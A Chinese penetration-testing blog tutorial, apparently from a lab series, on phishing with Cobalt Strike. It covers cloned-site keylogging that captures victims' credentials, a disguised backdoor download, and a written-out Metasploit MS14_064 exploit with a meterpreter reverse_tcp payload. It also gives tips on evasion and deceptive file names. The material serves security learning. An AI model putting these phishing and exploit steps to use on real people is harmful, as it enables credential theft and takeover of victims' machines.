渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)
**
渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)
**
作者:大余
时间:2020-12-17
简介:
渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。
请注意:
对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
文章目录
- 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)
- 一、前言
- 二、环境介绍
- 三、钓鱼演示
- 1、智能收集
- 2、克隆模块和克隆网站进行键盘记录攻击
- 3、克隆网站下载执行木马
- 4、Metasploit溢出代码与Cobalt Strik配合钓鱼
- 四、总结
一、前言
网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。
网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。
这篇主要演示如何克隆和利用漏洞等方式进行钓鱼,并控制对方!!
二、环境介绍
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4
VPS服务器:
目前演示是用kali来架设做VPS公网服务器的!道理意义一样!
办公电脑:
系统:windwos7和windwos xp
目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过各种方式办公电脑收到对方邮件或者各种手段发送的钓鱼链接,最终黑客控制办公电脑的过程!!
三、钓鱼演示
下面会演示到所有CS自带模块中的钓鱼攻击演示!!
1、智能收集
打开System Profiler-分析器功能…
选择克隆www.baidu.com
页面做钓鱼…
攻击对象访问:http://192.168.1.9/baidu
当通过各种形式…将192.168.1.9/baidu链接发送给对方,让对方点击后…跳转到了baidu页面…
可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!
2、克隆模块和克隆网站进行键盘记录攻击
打开Web Drive-by–Clone Site克隆网站模块…
这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!!
勾选Log Keystrokes on cloned site后,记录键盘操作!
打开Web Log,功能查看被攻击方登录页面的操作情况!
可看到访问192.168.2.153:801页面输入了用户名密码…
可看到记录了对方输入键盘的信息!!
3、克隆网站下载执行木马
打开Host File 克隆一个页面并提供一个后门文件…
file:选择CS生成的shell,或者MSF也行!
确定URL下载的地址端口链接等情况!
生成http://192.168.2.153:801/upload.exe恶意链接…
然后回到方法2中!!
在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼!
意思就是对方访问http://192.168.2.153:801/dayu
页面后会直接下载attack恶意链接后门文件,页面正常跳转到百度页面!
可看到google访问该页面下载了upload.exe生成的CS后门文件…
这里google带有web安全下载防御功能,IE高版本也会有提示,这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!
4、Metasploit溢出代码与Cobalt Strik配合钓鱼
本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!
use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost 192.168.2.153
set SRVPORT 6666
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.153
exploit
这里很简答,MSF执行即可~
http://192.168.2.153:6666/Sixcra
获得恶意链接!
很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!!
这里就不勾选键盘记录了,因为直接能控制对方了!
生成URL:http://192.168.2.153:80/baidu
可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…
但是通过溢出漏洞在攻击端获得了对方的控制shell…
通过控制,继续横向渗透即可!!
四、总结
这里有四种方法,总结下思路,就是各种模块之间的配合进行简单的钓鱼,知道这些思路后,还可以和别的钓鱼工具配合,或者是别的方法融合!
这里提醒下,如果在克隆模块克隆的是HTTPS的页面,需要在攻击方加载SSL哦,不然没法记录或者执行!!
今天基础牢固就到这里,虽然基础,但是必须牢记于心。
要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。
如失效加个人以下图,个人微信拉入群。
渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)相关推荐
- 【黑金原创教程】【FPGA那些事儿-驱动篇I 】实验二十五:SDHC模块
实验二十五:SDHC模块 笔者曾经说过,SD卡发展至今已经衍生许多版本,实验二十四就是针对版本SDV1.×的SD卡.实验二十四也说过,CMD24还有CMD17会故意偏移地址29,让原本范围指向从原本的 ...
- 细说——Cobalt Strike钓鱼
目录 启动环境 windows服务端启动 windows启动客户端 HTA恶意文件投递 1. 生成恶意HTA 2. HTA利用 3. 上钩 信息收集(System Profiler) 1. 生成恶意地 ...
- 渗透测试之地基服务篇:无线攻防之Kali自搭建钓鱼Wifi
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...
- 渗透测试之地基服务篇:无线攻防之钓鱼无线攻击(上)
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...
- 渗透测试-地基篇-美杜莎Medusa(十二)
** 渗透测试-地基篇-美杜莎Medusa(十二) ** 作者:大余 时间:2020-11-27 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多 ...
- 渗透测试之地基服务篇:服务攻防之中间件JBoss
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意: 本文仅用于技术讨论与研究,对于所有笔 ...
- 【每天学习一点新知识】渗透测试信息收集篇
目录 1.网页直接获取信息 2.端口扫描 3.子域名查询 4. C段旁注 5.网络空间搜索引擎.谷歌语法 6.whois查询 渗透测试流程: 信息收集是渗透测试的前期工作,对于渗透测试来说十分重要.只 ...
- JVM 学习笔记二十五、JVM监控及诊断工具-命令行篇
二十五.JVM监控及诊断工具-命令行篇 1.概述 性能诊断是软件工程师在日常工作中经常面对和解决的问题,在用户体验至上的今天,解决好应用软件的性能问题能带来非常大的收益. Java作为最流行的编程语言 ...
- PhotoShop算法实现高级篇--色彩特效(三十五)
PhotoShop算法实现高级篇--色彩特效(三十五) kezunhai@gmail.com http://blog.csdn.net/kezunhai Photoshop中有很多色彩特效,本文介绍几 ...
最新文章
- 29个月过去了,CSDN排名前200了:排名不断靠前的过程中,自己的技术水平和竞争力一定会不断向上...
- jQuery 3.1.1 官方下载地址
- 电费结算(electric)
- 2018.12.18运算符,分支结构(循环),异常处理,函数
- C语言描述栈的实现及操作(数组实现)
- Android应用开发实例篇(1)-----简易涂鸦板
- atoi 原来将字符串02002xzm100转换为int以后是2002
- Asp.net导出Excel报表(解决无网格问题)
- 免费素材:包含 250+ 组件的 DO UI Kit
- MapReduce计算PMI
- Android多分辨率适配框架(1)— 核心基础
- 使用结构化思维,让工作有条不紊
- 疯狂动物城简介第一台通用计算机,疯狂动物城 简介
- 锂离子电池热失控的机理
- Keil MDK介绍
- myEclipse8.5注册码
- 2020年强烈推荐 ,小友必须要看面经的面试题!!
- 马云:聪明的人都离开阿里了 剩下的成了富翁
- NS2 实现有 20 个节点的 WLAN
- STM32F103C8T6 ADC输入电流电压特性
热门文章
- c语言整数间以1个空格隔开,C语言:用for循环语句编程输出1—20之间的所有整数,两数之间以空格分隔...
- 怎样取消连续包月自动续费_小红书怎么取消自动续费
- 关闭云鲸拖地机器人风干_【未来科技范】评测云鲸拖地机器人:看它是怎么拖完地自己清洗抹布的...
- 请检验一下你的护肤品-是否含有矿物油成分?
- chartxy 柱状图_ChartControl 折线图 柱状图
- 保弘实业|家庭理财存款如何分配比例才好
- 抖音权重为什么会低了,该怎么去增加自己的权重高度。
- 火影几点服务器维护完,火影忍者ol3月10日维护更新内容正式版 3月10日更新限时积分商城开启...
- IOS9以上如何导入铃声并设置
- 湖北职业技术学院计算机专业宿舍,湖北职业技术学院宿舍条件